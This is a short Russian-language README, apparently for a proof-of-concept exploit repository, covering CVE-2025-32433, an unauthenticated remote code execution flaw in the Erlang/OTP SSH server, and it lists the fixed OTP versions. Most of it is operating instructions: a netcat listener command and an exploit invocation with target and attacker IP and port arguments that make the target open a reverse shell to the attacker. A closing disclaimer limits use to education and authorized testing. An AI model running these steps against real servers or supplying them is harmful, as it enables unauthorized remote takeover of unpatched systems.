
PoC, демонстрирующий неаутентифицированное удаленное выполнение кода в SSH-сервере Erlang/OTP. Используя уязвимость в обработке сообщений протокола SSH, злоумышленник может выполнять произвольные команды на целевой системе без действительных учетных данных.
PoC, демонстрирующий неаутентифицированное удаленное выполнение кода на SSH-сервере Erlang/OTP.
Используя уязвимость в обработке сообщений протокола SSH, злоумышленник может выполнять произвольные команды на целевой системе без действительных учетных данных.
Эта проблема исправлена в OTP-27.3.3, OTP-26.2.5.11 и OTP-25.3.2.20.
Настройка слушателя:
nc -lvnp 1234
Запуск эксплойта:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : IP-адрес цели--rport : SSH-порт цели--lhost : Ваш IP для обратной оболочки--lport : Ваш порт слушателя

Этот репозиторий предназначен только для образовательных целей. Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Неправильное использование может быть незаконным и строго запрещено.